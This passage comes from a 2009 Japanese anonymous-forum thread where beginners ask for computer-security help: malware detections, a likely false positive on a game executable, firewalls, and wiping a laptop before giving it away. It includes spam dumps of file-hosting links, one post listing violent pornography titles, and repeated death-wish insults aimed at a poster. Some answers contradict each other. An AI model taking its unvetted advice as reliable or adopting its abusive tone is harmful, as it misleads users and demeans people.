>ピンポイントでIEが起動できなくまる
→HTMLが開けなくなるの間違いです
71:名無しさん@お腹いっぱい。
09/07/07 14:24:20
>>69
> Windowsアップデートによる何かの不具合
ではなく >>65 で自ら書いているように
> 悪意あるマルウェアを削除
が原因になる。
悪意のあるマルウェアに今回のトラブルに関連した重要な部分を
置き換えられていて、それらを削除されたから問題が出た、と。
で、どれを削除されたかも覚えてなく、
(ログはどこかにあった気がするが、削除された数が数だし…)
> Win32モードでは起動できません
この手のトラブルまで起きているならリカバリーした方が早い。
HTMLが開けないだけなら、IEの修復などで直りそうだが。
72:名無しさん@お腹いっぱい。
09/07/07 14:58:13
(ο^д^)ノシ
73:名無しさん@お腹いっぱい。
09/07/07 21:21:14
ポート23015に物凄い勢いでアクセスしている何かがいるんですが
これ何ですか。
IP変えたりしながら5秒毎に来るんですが。
74:名無しさん@お腹いっぱい。
09/07/07 21:43:49
不正アクセスでしょ
75:名無しさん@お腹いっぱい。
09/07/07 21:52:59
いや、それはわかっているんですが、
1時間半で1200件というのは今までになかったんですよ。
特定のポート(23015)だけに5秒毎にアクセスするようなボットとかあるんですかね。
76: ◆N9P3SuvBPo
09/07/07 22:36:41
Microsoft Video ActiveXとかいうのに脆弱性か…
俺の環境では全然影響の無いことですが、他のみんなは気を付けろ。
ゼロデイだから。
URLリンク(headlines.yahoo.co.jp)
77:名無しさん@お腹いっぱい。
09/07/07 22:53:09
/二ニ=-、
/> r-(⌒ヽ⌒ヽ
/ソ ̄/ /\ \ ヽ
// // |\ |\|
/ | ヾ
| ̄|
|万|
|馬|
|券|
|_|
78:名無しさん@お腹いっぱい。
09/07/07 22:54:05
>>76
あなたの環境を教えてください
ここで晒せば少しはRecoveryする奴も減るんじゃね?
79:名無しさん@お腹いっぱい。
09/07/07 22:56:45
IEを使わなければいい
80:名無しさん@お腹いっぱい。
09/07/07 22:59:28
>>76氏
ロムってる者ですが、そういう情報助かります
81: ◆N9P3SuvBPo
09/07/07 23:15:42
>78
とりあえず、XPなら制限ユーザー、Vistaおよび7なら標準ユーザーを常用し、
DEP(データ実行防止)機能を全てのプログラムに対してやっとくこと。
これだけでもかなり違う。
あと件の脆弱性ですが、記事にも書いてあるとおり、
>Windows VistaおよびWindows Server 2008は影響を受けない。
とのことです。
Windows7はどうだろう?
XPモード時だとやはり影響受けるのかな?
82:名無しさん@お腹いっぱい。
09/07/07 23:47:44
scrのファイル踏んでしまった
ファイルのほとんどがT605の拡張子で237kbになってしまった
ほんとにファイルはあぼーんになったの?
どうすればいい?
助けてください。
83: ◆N9P3SuvBPo
09/07/07 23:53:10
>82
マルチはらめぇ!!
84:名無しさん@お腹いっぱい。
09/07/07 23:54:42
WinXP で NortonInternetSecurity を使っています。
ファイヤーウォールに関してなんですが、特定の人物からのアクセスを可能な限り
遮断したいと思っています。 IP単位で指定してブロックはわかるのですが、
リモートホスト名を正規表現で指定してブロックすることができるソフトってありませんか?
そもそも理屈として無理なのかな?とも思うのですが、
似たようなことを実現できる手法・ソフトがあれば教えてください。
85:名無しさん@お腹いっぱい。
09/07/07 23:57:36
なぜ制限ユーザー?
不便じゃね
86:名無しさん@お腹いっぱい。
09/07/08 00:39:00
>>81
IEを使わなければいいだけ
87:名無しさん@お腹いっぱい。
09/07/08 00:42:06
2chからAV女優サイトに飛ばされたらTrojan.Zlob が
入ってしまいました、ノートンは入ってますが反応しません。
朝大量に画面が出てよく分からないままで、どうすればいいか
分かりません、お願いします。
88:名無しさん@お腹いっぱい。
09/07/08 00:47:19
ハ,,ハ
(゚ω゚ ) おこと
⊂ ⊂) ∧_∧
⊂二⌒⊂∑( ゜Д゜)
γ 二つ つ
{ (
ヽ,_)ヽ,_)
ハ,,ハ ∧_∧
( )∩;;)3゙゚').・:; わり
Oゝ ノ、 O)
/ ) ( \
( / ̄∪ ∪ ̄\)
.゚:。。:.
:゚ _∩゚:・
. ゚:⊂/ ノ )
/ γ
.・ し⌒J
゚。:
ハ,,ハ
( ゚ ω∩ します
ο ノ
/_ O
'(ノ
89:八頭 ◆YAGApwSaEw
09/07/08 01:09:49
>>87
僕が指示を出すから
【ノートン】Norton Internet Security Ver.168【2009】
スレリンク(sec板) へ移動して、
>>2の報告・質問用テンプレートを使って再相談
90:名無しさん@お腹いっぱい。
09/07/08 01:14:53
【使用OS】 『XP SP3』
【PCスペック】 『CPU:1.73GHz 、メモリ:1.49GB
【使用ブラウザ】 『IE8』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウイルスセキュリティzero 2009年』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】 ニコニコ動画サイト全体が読み込めない
【過程と措置】ウイルスセキュリティzeroの設定から、「すべての機能を無効にする」にすると普通に見れるようになる。
このまま無効にしておけばよいといいたいところでしょうが、なんか不安なのでこのセキュリティを起動したまま
ニコニコ動画を見れるようにするにはどうしたらよいでしょうか。
【その他】 ようつべは問題なし。
91:名無しさん@お腹いっぱい。
09/07/08 01:18:05
>>90
明日サポートに相談
92:名無しさん@お腹いっぱい。
09/07/08 01:32:44
>>90
つ 取説のトラブルシューティング
93:名無しさん@お腹いっぱい。
09/07/08 01:36:27
>>90
zeroは辞めた方が良いね。人それぞれかも知れないが
サポートも弱いしオススメはしない。しかも完全削除ツールも
無いから残骸が残る。
NIS、マカ辺りが使いやすいと思う。VBは・・・自己責任でw
他にG DATA、KIS他とかもあるが初心者だとどうかな
94:名無しさん@お腹いっぱい。
09/07/08 01:54:24
>>93 同感。2009版以降のスレ見たり、最近の状況を読んでみたらよい。色々書いてあるけど、
自分で判断すればいいっしょ。McAfeeとか、安定してるから使ってみると良いと思うよ。
95:名無しさん@お腹いっぱい。
09/07/08 01:57:51
【使用OS】 『XP MCE SP3』
【PCスペック】 『CPU:C2D1.86GHz 、メモリ:3.00GB
【使用ブラウザ】 『Lunascape 5.0 (Gecko/Trident併用)』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『KIS 7.0』
【回線の種類・ルータの有無】 『光回線でルータ使用(無線/Macホワイトリストのみ許可/数ポート開放)』
【具体的な症状】
PCつけっぱのまま外出、先ほど帰宅したところ、画面にウイルス警告が出ていた。
検出名:Trojan.Win32.Vapsup.uie
ファイル:C:\Program Files\上海アリス幻樂団\東方地霊殿\th11.exe
【過程と措置】
1.とりあえず削除を選択。
2.対象ディレクトリからファイルが削除されていることを確認。
3.警告ウインドウに出ていたリンクより情報の取得を試みるも、KasperskyLabには該当項目なし。
URLリンク(www.viruslistjp.com)
4.検出名でぐぐってみたところ、ウイルスの別名リストを発見。
URLリンク(www.threatexpert.com)
5.トレンドマイクロのページに主導削除の方法が記載されていた為、実行を試みる。
URLリンク(www.trendmicro.co.jp)
6.ところが、記載されているようなレジストリの値/キーが存在せず、対応ができない。
7.現在Kasperskyのファイルスキャンを実行中。
8.終了次第FScanのオンラインスキャナでのスキャンを実行予定。
続く
96:名無しさん@お腹いっぱい。
09/07/08 01:59:22
【その他】
1.該当ファイルの内容は去年の夏ごろにインストールを行った同人ソフトと考えられる。
2.当然ながら割れ物などではなく、購入先はコミックマーケット(2008年夏)。
3.調べ方が正しいのであれば、該当のウイルスは単体のワームであり、ファイルへの感染は行わない。
4.大手サークルの頒布物であり、現在までウイルス情報もなく、CDにウイルスが入っているとは考えにくい。
5.去年の夏に頒布されたものである為、今になってウイルスとして検出されるとは考えにくい。
現在、以上のような状態になっていますが、本当にこの調べ方/対応方法であっているかどうか、素人の為判断がつきません。
セキュリティについて詳しい皆さんであれば、同様のケースに対する情報等お持ちではないかと思い、ご相談させていただきました。
97:八頭 ◆YAGApwSaEw
09/07/08 02:21:04
>>95-96
駆除に関しては問題無いみたいだけど(半年以上検出しなかったのは問題だけど・・・)
文章からして誤検出と判断しているんだろうけども
このケースは意図的な大量配布の可能性もあると思う。
>>6のIPA情報処理推進機構 (情報セキュリティに関する届出) へ連絡を取って調べてもらうのがいいと思う
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
なるべく多くのセキュリティベンダへ検体提出してもらうのがいいと思う。
98:名無しさん@お腹いっぱい。
09/07/08 02:25:32
地霊殿てのが微妙な……
まあ、VB2007でもth11.exeが隔離されると言う現象があったらしいですが。
ご使用のソフトは、カスペルスキーですね?
スレリンク(gamestg板:644-645番)
ここの情報から更新後、ウイルスとして検出された可能性もあります。
VTで該当ファイルを検査されるとはっきりすると思いますが。
COMODO、Aviraでも同様に、th11.exeの検出報告が相次いでいるようです。
99:名無しさん@お腹いっぱい。
09/07/08 02:27:37
そんなもんでオタオタする奴がなんで
>数ポート開放) してんのよ ?
100:八頭 ◆YAGApwSaEw
09/07/08 02:39:03
某ブログにF-Secureのオンラインスキャンでも同パスの検出例があった
Symantecへは連絡だけしておきました
101:名無しさん@お腹いっぱい。
09/07/08 02:41:17
>>100
GENOの感染経歴もある人のBLOGなら
同じところみましたね。
102:名無しさん@お腹いっぱい。
09/07/08 02:43:12
>>97
>>98
貴重な情報有難うございます。
先ほど検出可否報告スレよりウイルス詰め合わせをダウンロードし検出テストを行った結果、
KAV使用の別の方が検出を行ったものと同数のファイルが検出されました為、
少なくともローカルのKAVの検出機能に障害は発生していないようです。
恐らく皆さんがおっしゃるように語検出ではないかと思いますが、
念の為地霊殿再インストールの後、exeを検体としてIPAに提出しようかと思います。
助言いただき有難うございました。
>>99
使用しているポートは絞っており、ポートスキャンにより他のサービスが動いていないことを確認済みです。
しかしながら、セキュリティに関して絶対の自信を持っているわけではないので、
自分以外の信用が置けるソースからの情報が得られないと不安でなりません。
自分の調べ方に不足が合ったようで、お手数をおかけ申し訳ございませんでした。
重ね重ね有難うございました。
103:名無しさん@お腹いっぱい。
09/07/08 02:44:38
>>102
ついでに神主さんにも教えてあげると良いかも。
104:八頭 ◆YAGApwSaEw
09/07/08 02:54:11
>>102
再インストールしないで
まず連絡とって検体提出方法の指示をもらうように
105:名無しさん@お腹いっぱい。
09/07/08 02:58:02
まあ誤検出だろうし
製作者じゃないけど、問題ないだろ
多分
106:名無しさん@お腹いっぱい。
09/07/08 02:59:37
F-SecureのエンジンにはAVPがあったと思う
まあ、検出するのも無理はない
107:名無しさん@お腹いっぱい。
09/07/08 03:02:35
>>102
どうやらCDからも検出されたようです
まあ、誤検出確定かも知れんね
108:名無しさん@お腹いっぱい。
09/07/08 03:50:04
>>89
>>14
>>82 >>87
諦めてPCリカバリしろ。
他の方法では対処できません。理由は>40とか>43辺りを読んでください。
>>90
ZEROは使ったこと無いけど、ペアレンタルコントロールかなにか入れてないか?
子供に有害なサイトを見させないためのフィルタリングで引っ掛かってるだけじゃないかな。
個人的にはそんなソフト捨てて、もっとまともなセキュリティソフトを入れなさいと。
109:名無しさん@お腹いっぱい。
09/07/08 03:58:40
>>95-96
行なった手順を読む限りでは、誤検出の可能性が高いと思う。
自分が使用しているセキュリティベンダー宛に、誤検出として検体提出を。
カスペの検体提出先は Kaspersky Lab <newvirus☆kaspersky.com> ☆をアットマークに置き換えてください。
1.一時的にセキュリティソフトを切って、該当ファイルをパスワード付きZIPで圧縮する。
パスワードは"infected"。
2.セキュリティソフトを再度有効に戻す。
3.メールタイトルに「False detection」または「False Positive」と入れる。
メール本文もタイトルと同一文面。
メール本文には、そのほか、回答パスワードも記載。「Extract Password : infected」
4.圧縮したファイルを添付して送信する。
5.あとはパターンの修正を待つ。
(このほかに、隔離してから提出する方法もあります)
八頭が勧めているIPAへの届け出は行なわなくていいです。というかやっちゃだめです。
あそこへの届け出は「実際に感染した」という報告なので、誤検出かもしれないものを報告する窓口ではありません。
>>104
役立たずどころか迷惑になる可能性の高い回答してんじゃねーよ。
頼むから、お前はもう出てこないでくれ。質問者にも、他の回答者にも迷惑がかかる。
110:キチガイ嵐はスルー
09/07/08 04:27:12
108 名前: あぼ~ん [あぼ~ん] 投稿日: あぼ~ん
あぼ~ん
109 名前: あぼ~ん [あぼ~ん] 投稿日: あぼ~ん
あぼ~ん
111:名無しさん@お腹いっぱい。
09/07/08 05:32:54
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
クボタタケシ Part.2 [HIPHOP]
【社会】日本に帰化した韓国人男性、対馬の自衛隊施設で不可解行動=施設内に記載された演習日程や人員配置など書き写す [ニュース二軍+]
●朝鮮の反日企業 口ッテ製品不買運動 4品目 ● [ハングル]
【B's社長】アルビサポスレPART34【ありがとう】 [国内サッカー]
都立新宿山吹高校part23 [お受験]
112:あぼ~ん
09/07/08 09:15:19
あぼ~ん
113:名無しさん@お腹いっぱい。
09/07/08 11:08:44
>>110
八頭もスレの監視大変だねぇ。
114:名無しさん@お腹いっぱい。
09/07/08 13:07:50
そやけど、これと言ってパッとしない回答ばかりだと思うんだよね
昔のこのスレは自演ばかりだったけど、回答もしっかりとやってたし
おいらもこのスレに何度も助けられてる身だから、このスレは参考になると思う
検索サイトで斜め読みしただけのレベルで回答してる奴って正直、いらないんじゃないかと
このスレが今日も続いているのは、真面目に回答してる人達がいてこそだよねっ
回答できるスキルは全くないので、ただロムるしかできないけどねおいらは
115:名無しさん@お腹いっぱい。
09/07/08 13:09:25
ハチ! もう帰ってこないんだよ!
116:名無しさん@お腹いっぱい。
09/07/08 14:31:43
>>114
八頭みたいな糞のことですね
わかります
117:名無しさん@お腹いっぱい。
09/07/08 16:23:34
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
118:名無しさん@お腹いっぱい。
09/07/08 16:39:42
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
119:名無しさん@お腹いっぱい。
09/07/08 16:42:27
↑これ見て大丈夫なやつですか?
120:名無しさん@お腹いっぱい。
09/07/08 16:56:16
>>119
この板から出て行け
121:名無しさん@お腹いっぱい。
09/07/08 17:14:15
なんで?
ただ聞いただけですけど
122:名無しさん@お腹いっぱい。
09/07/08 17:34:36
>>119
勇気がなくて踏めない人のための鑑定スレPart19
スレリンク(hack板)
123:名無しさん@お腹いっぱい。
09/07/08 18:33:49
>>122
ありがとうございいます
124: ◆N9P3SuvBPo
09/07/08 18:37:34
>>114
そうですね。
真面目に質問に答えてくれる回答者がいて、このスレが成り立ってると言っても過言ではないです。
あと、ROMも勉強になりますからね。
125:名無しさん@お腹いっぱい。
09/07/08 18:37:54
>>123
お前死ねよ
そんなものに興味を持つような奴にセキュやる資格なし
126:名無しさん@お腹いっぱい。
09/07/08 18:58:23
ここは初心者用スレ
127:名無しさん@お腹いっぱい。
09/07/08 19:07:56
初心者が回答する、初心者用スレな
128:名無しさん@お腹いっぱい。
09/07/08 19:14:47
初心者は疑問を文章にまとめる事によって気づく事があり、
玄人は初心者の何気ない書き込みからひらめきを得る。
129:名無しさん@お腹いっぱい。
09/07/08 19:26:11
>>128
素晴しい
130:名無しさん@お腹いっぱい。
09/07/08 19:38:08
低能乙
131:名無しさん@お腹いっぱい。
09/07/08 21:21:21
HPの管理人はアクセス解析でどこからアクセスしてるかわかると聞きましたがこういうのはパソコン単位で判別しているのですか?
それともリモートホスト?とかIP?とかで判別しているんでしょうか?
例えば同じ家から違うパソコンでアクセスした場合はどのように判別されるんでしょうか?
132:名無しさん@お腹いっぱい。
09/07/08 21:43:00
>>131
IPアドレスやブラウザ
133:名無しさん@お腹いっぱい。
09/07/09 00:45:37
環境変数。
134:名無しさん@お腹いっぱい。
09/07/09 01:18:48
八頭は居る?
135:名無しさん@お腹いっぱい。
09/07/09 01:54:33
いりませーん
136:名無しさん@お腹いっぱい。
09/07/09 13:29:19
URLリンク(www.share-online.biz)
URLリンク(www.share-online.biz)
URLリンク(www.share-online.biz)
URLリンク(www.share-online.biz)
URLリンク(www.share-online.biz)
URLリンク(www.share-online.biz)
URLリンク(www.share-online.biz)
URLリンク(www.share-online.biz)
137:名無しさん@お腹いっぱい。
09/07/09 13:30:44
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
138:名無しさん@お腹いっぱい。
09/07/09 13:31:41
URLリンク(img135.picfoco.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
URLリンク(hotfile.com)
139:名無しさん@お腹いっぱい。
09/07/09 13:33:46
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(rapidshare.com)
URLリンク(img123.hotlinkimage.com)
140:名無しさん@お腹いっぱい。
09/07/09 13:41:36
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
URLリンク(www.megaupload.com)
141:名無しさん@お腹いっぱい。
09/07/09 16:26:28
>>114
わろた
おい八頭!
>>114はお前へのメッセージだぜ!
142:名無しさん@お腹いっぱい。
09/07/09 21:44:57
30 名前:八頭 ◆YAGApwSaEw [sage] 投稿日:2009/07/09(木) 21:43:45
URLリンク(h.imagehost.org)
NIS2010βのインストーラーがエラーでDL出来なかったorz
英文メールを送ったら、わずか数分後に返信が届いていたw
『追って連絡します』とのこと
ピザ屋の出前かよ!
143:名無しさん@お腹いっぱい。
09/07/09 21:45:47
ハチ ご主人様はもう帰ってこないんだよ ハチ
144:名無しさん@お腹いっぱい。
09/07/09 21:56:43
>>142
こんな糞なトーシロがアドバイスとか笑わせる
145:名無しさん@お腹いっぱい。
09/07/09 23:23:09
友人にノートパソコンを譲ることになりました。
しかし、そのパソコンは親父が使っていたもので、親父の個人情報などがネットから流出する可能性もあります。
目に付くものは手当たり次第消したのですが、これでは不十分ですよね?
リカバリソフトを持っていないのですが、どうしたらそのパソコンの個人情報を極力消去して初期状態に戻すことができますか?
ちなみに、その友人が悪用するとかそういうことを気にしているわけではないです。
むしろ、PC関係に疎すぎるのでウイルスとかに感染しないかが心配なのです。
よろしくお願いします。
146:名無しさん@お腹いっぱい。
09/07/09 23:25:41
リカバリーできないPCを素人に譲るなw
147:名無しさん@お腹いっぱい。
09/07/09 23:36:06
CD無しにはリカバリをあきらめなくてはいけないということでしょうか?
148:名無しさん@お腹いっぱい。
09/07/09 23:45:29
>>145-147
>CD無しにはリカバリをあきらめなくてはいけないということでしょうか?
基本的にはYes。
ノートPCの場合は、メーカーに問い合わせて、リカバリCD(有償)を入手してください。
物によっては、HDDのマウントしていない領域に、リカバリイメージが置かれている場合があり
起動時に特定のキーを押すことでリカバリを開始できるものもあります。
少なくとも、他人に譲渡する際は、リカバリしてからというのが礼儀でしょう。
リカバリできない状態のPCを他人に譲渡するのはやめたほうがいいです。
149:名無しさん@お腹いっぱい。
09/07/09 23:50:31
>>174
リカバリしても未使用領域に記録されたデータはOSからは認識されてないだけで残っている。
復元できてしまう可能性有。
HDDのデータを消去できるソフトで生HDD状態にしてからリカバリするのがBEST。
150:149
09/07/09 23:57:31
誤>>174
正>>147
151:145
09/07/10 00:02:20
>>148
ありがとうございます。
礼儀だったのですね。知らなかったorz
メーカーにまずは問い合わせてみます。
>>149
たとえばどういうソフトのことを言うのでしょうか?
リカバリー=HDDの初期化
だと思ってたのですが違うのですか?
152:名無しさん@お腹いっぱい。
09/07/10 00:08:38
>>145
>>151ググリなさい
153:149
09/07/10 00:23:52
リカバリーとはメーカー製PCを工場出荷状態に戻すこと。
ただしフォーマットしても今まで書き込んだデータを消すわけではない。
リカバリーで新しくデータが書き込まれた部分は問題ないがそれ以外の部分には
古いデータが(通常はOSからは認識できないだけで)残っている。
CD-ROMが無いとのことだが、数年前からCD-ROM無しでHDDの一部にリカバリー部分を
収めたPCが普及しているので買った時に付いていた冊子で確認してみ。
冊子が無い場合メーカーサイトから冊子を見られる可能性あり。
消去ソフトは有料も無料もある。
HDD データ消去
URLリンク(www.google.co.jp)
154:名無しさん@お腹いっぱい。
09/07/10 01:49:00
現在WinXPsp2でavast+spybotS&Dという構成です。
ソフトも定義ファイルも常に最新の状態にしていますが、ルーターのログに不正アクセスがよく残ってます。
ウイルススキャン等をしても検出される事はありませんし、シマンテックのセキュリティスキャンもしてみましたが、オールクリアでした。
しかし、怪しい挙動や、接続インジケーターがどこかと通信してる事があったりして、不安です。
このような状況で、ファイアーウォールソフトを追加する事は有効でしょうか?
また、相性やオススメはありますか?
ちなみに、セキュリティ関係はあまり詳しくありません。
よろしくお願いします。
155:名無しさん@お腹いっぱい。
09/07/10 01:51:46
質問させてや
【使用OS】 『windowsXPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: core2、3GHz 、メモリ: 3GB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『Firefox3』 例、Firefox 3
【Microsoft Updateの更新の状態】 『最新』 例、自動更新設定
【セキュリティソフトと年式】 『Avast』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『spybot、ad-awarePRO』
【回線の種類・ルータの有無】 『光回線マンションタイプ、ルータは不明』 例、光回線でルータ使用中
【具体的な症状】 『起動時間を短縮しようとシステム構成ユーティリティの画面を開いて、スタートアップの所を見ると「ara-key」という見なれないものがありました』
【過程と措置】 『avastでスキャンしましたが見つからず、ara-keyを検索してもファイルがないと言われてしまいました』
【その他】 『ara-keyとは一体なんでしょうか?とくに怪しいサイトは見てません』
156:名無しさん@お腹いっぱい。
09/07/10 02:12:56
>>155
暴露型ウイルスの形跡ではないかと思われます。
PCをリカバリし、二度とファイル共有に手を出さないように注意すること。
URLリンク(www.symantec.com)
157:155
09/07/10 02:15:47
>>156
何時何処で何時何分何秒ファイル共有ソフト使ってるって俺が言ったっていうかファイル共有ソフトは使ってないよ
あほ?
158:名無しさん@お腹いっぱい。
09/07/10 02:17:21
八頭死ね
頭悪いし
死んだほうがいいよったく
ねくらだな最早
159:名無しさん@お腹いっぱい。
09/07/10 02:18:48
>>157
態度でかいんだよ
お前のような奴は死ね殺されろ
160:名無しさん@お腹いっぱい。
09/07/10 02:24:07
>>154
有効です。
URLリンク(eazyfox.homelinux.org)
>ルーターを使っているならパーソナルFirewallは不要?
>ブロードバンドルーターが安価になり、自宅でも複数台のPCを利用するためルーターを使用される方が多くなってきました。
>ルーターはFirewallのパケットフィルタという機能だけを考えると同等であり、重複して使用する意味は無いと考えられる方が
>いらっしゃいます。
>
>しかしパーソナルFirewallはルーターには無い「アプリケーションとパケットフィルタを関連付けて制御する」ということが
>可能です。つまりルーターにとってはOutlookでメールを送信するのも、ウィルスが外部にメールを送信するのも同じで
>区別がつきませんが、パーソナルFirewallではウィルスが送信するメールだけを阻止することが可能です。同様にトロイの
>木馬が外部へデータを送るのを阻止することもパーソナルFirewallには出来ますが、ルーターでは阻止できません。
>
>つまりルーターだけでは安心できない、パーソナルFirewallを組み合わせて使うことが必要となります。
Outpost, Comodo,Online Armor などから好きなものを選べばいいでしょう。
私は PC Tools を使ってますが、特に重くなったとかは感じてないです。防御力はちょっと微妙ですが。
比較ページ
URLリンク(wiki.livedoor.jp)
URLリンク(eazyfox.homelinux.org)
URLリンク(www23.atwiki.jp)
161:155
09/07/10 02:24:20
>>159
あんたじゃ話にならんわ
八頭様を呼べ
この板で最もスキルが高いと噂されてるあの八頭様を
162:名無しさん@お腹いっぱい。
09/07/10 02:26:39
>>157
では、ファイル共有をやってる誰かの所から貰ってきたのかもしれませんね。
Avast以外のオンラインスキャンを利用して、複数のセキュリティソフトでスキャンしてみてください。
残骸なのか、本体が隠蔽されてるのかはわかりませんが・・・PCリカバリを推奨しておきます。
163:名無しさん@お腹いっぱい。
09/07/10 02:27:34
>>161
一番スキルが低い奴呼んでどうする。本人の自作自演で出てくるのかな?
ハチ公、来なくていいぞ。
164:八頭 ◆YAGApwSaEw
09/07/10 02:30:56
ウィルス情報質問 総合スレッド★Part39
370 名前:名無しさん@お腹いっぱい。 mailto:sage [2006/11/30(木) 22:10:03 ]
【使用OS】 windowsXP
【WINDOWS UPDATE】 できなくなった
【ウィルスソフト】 ノートンが入っていたような・・・&hijackthis
【UPDATE】 たぶん
【スキャン】 hijackthisっていう解析ソフトで↓の奴が出てきた
O4 - HKLM\..\Run: [ara-key] C:\Program Files\WindowsUpdate\wuaudnld.tmp\cabs\com_microsoft.Q831167_IE6_SP1\Q8311674967.exe -StartUp
O4 - HKLM\..\Run: [Windows Security Manager] C:\Windows\system32\drivers\etc\svchost.exe -c -ax
【症状】 起動すると「フォルダが壊れています」っていうようなメッセージがでてくる
【やったこと】 何もしていない・突然出てきた
【とった処置】 毎回起動時に出てくる上のメッセージを閉じてる
371 名前:名無しさん@お腹いっぱい。 mailto:sage [2006/11/30(木) 22:15:57 ]
>>370
O4 - HKLM\..\Run: [ara-key]・・・っていうエントリーは百発百中antinny
っていうウイルスなんだけど、このウイルスってnyしてなければ
感染することなんて完全皆無だけどね。
お前、winnyしてるんじゃないんか?
165:名無しさん@お腹いっぱい。
09/07/10 02:32:28
>>155
登録名とファイル名が同じとは限らないでしょう。
システム構成ユーティリティのコマンドでファイルパスが確認できるのでは?
ファイルが特定できたら他社で検出されるか確認。
URLリンク(www.virustotal.com)
他社で検出確認出来たとしてもウイルスか否かの最終判断は貴方。
50%以上で黒判定なら略間違いなし?
30%程度でも有名所複数なら略黒判定?
どのように判断するかは貴方次第。
他社で検出確認出来ればウイルス名も判るので場合によっては対処法もわかるかも。
もし自演なら八頭の完全サポート劇場をみせてくれw
166:名無しさん@お腹いっぱい。
09/07/10 02:34:44
ハチ公キタ━━━(゚∀゚)━━━ !!!!!
167:八頭 ◆YAGApwSaEw
09/07/10 02:38:11
P2PウイルスをP2P以外のサイトで目撃することはありますよ
分類がP2Pウイルス(シェア拡散ウイルス)なワケですから・・・
>>156さんに従い(>>48も読んで)
悪質な被害を及ぼすジャンルですから駆除とか考えずに
この場合、割り切ってスッキリ完全フォーマットが賢明ですね
168:155
09/07/10 02:43:35
>>162
あんたの言うことは聞きません
八頭様の言うことが全てです
>>163
自作自演じゃないって言ってるだろ
>>164
>八頭様
ありがとうございます
たしかに起動時いつも「フォルダが壊れています」というメッセージが出てきました
まえには「指定されたファイルが見つからない」というメッセージも出てました
悪意のあるソフトはインスコした覚えはないのですが
いつもはavastでスキャンするし、問題なければファイルを開く
んですよ
だれもファイル共有ソフトは使ってないと言ってるのに、信じてくれないなんて
ねっとのまなーを少し学べやと言いたいね
>>165
virusとありますが、踏んで大丈夫ですか?
あと自演じゃないよ
169:名無しさん@お腹いっぱい。
09/07/10 02:45:04
>>168
わろす
170:165
09/07/10 02:51:34
>>168
リンク先は安全だと言えば踏むし、罠だったと言えば踏まないのか?
好きにすればよいでしょう。すべては自己判断、自己責任なのだから。
171:八頭 ◆YAGApwSaEw
09/07/10 02:54:58
ITmedia エンタープライズ
会社に潜む情報セキュリティの落とし穴:「ウイルス対策ソフトは万能」という神話を改めよう 2009/07/07
「ウイルス対策ソフトを使えば安心」という意識がPC初心者を中心に根強く存在する。
しかし、ウイルス対策ソフトには強みも弱みもあり、万能ではない
URLリンク(www.itmedia.co.jp)
【セキュリティソフトと年式】 『Avast』 ← 単体では検出の偏りが大きいし、アジアを意識して守ってくれてるわけでもないし
【その他スパイウェア対策ソフト】 『spybot、ad-awarePRO』 ← ほとんど役に立たない
たぶん雑誌とかを参考に組み合わせたんだろうけども日本人が使うにはアブナイ組み合わせです
Nortonスレでも・・・ 現状こうするしかないのです
スレリンク(sec板:24番)
次の守りの参考にしてください
172:名無しさん@お腹いっぱい。
09/07/10 03:14:58
八頭よ、自作自演も、正しいように見えて大筋では間違ってる回答もどっちもいらんから。
お前が出てくるのはスレ利用者の迷惑にしかならんぞ。
173:155
09/07/10 03:29:01
八頭いらん
リンクしか張れない低脳回答なんて意味ねえんだよ
174:名無しさん@お腹いっぱい。
09/07/10 03:45:29
じゃあ紙芝居か
175:名無しさん@お腹いっぱい。
09/07/10 05:09:57
八頭なんか検出可否スレに篭もればいいんだ
176:名無しさん@お腹いっぱい。
09/07/10 07:00:32
>>160
>>154です。
詳しい解説ありがとうございます。
比較検討して導入したいと思います。
ありがとうございました。
177:名無しさん@お腹いっぱい。
09/07/10 09:54:30
女体拷問研究所 11
URLリンク(pics.dmm.co.jp)
URLリンク(www.mybtfile.com)
(SDAISTIC VILLAGE)羞恥!強制潮吹街中を引き廻せ!大沢佑香
URLリンク(pics.dmm.co.jp)
Link URL: URLリンク(www.dayform.com)
(SDAISTIC VILLAGE)陵辱!女子校生マシンバイブ 3 香奈々
URLリンク(pics.dmm.co.jp)
Link URL: URLリンク(www.dayform.com)
[笠倉出版社] [sak8449] 女子校生監禁レイプ つぼみ
URLリンク(pics.dmm.co.jp)
URLリンク(www.mybtfile.com)
(GLAYZ)キャンギャル調教 Felix Vicious
URLリンク(pics.dmm.co.jp)
Link URL: URLリンク(www.pidown.com)
奴隷女教師 邪淫の制服 松野ゆい
URLリンク(pics.dmm.co.jp)
URLリンク(www6.mimima.com)
178:名無しさん@お腹いっぱい。
09/07/10 10:00:16
>>175
ごめん、検出可否スレでもいらない子。
179:名無しさん@お腹いっぱい。
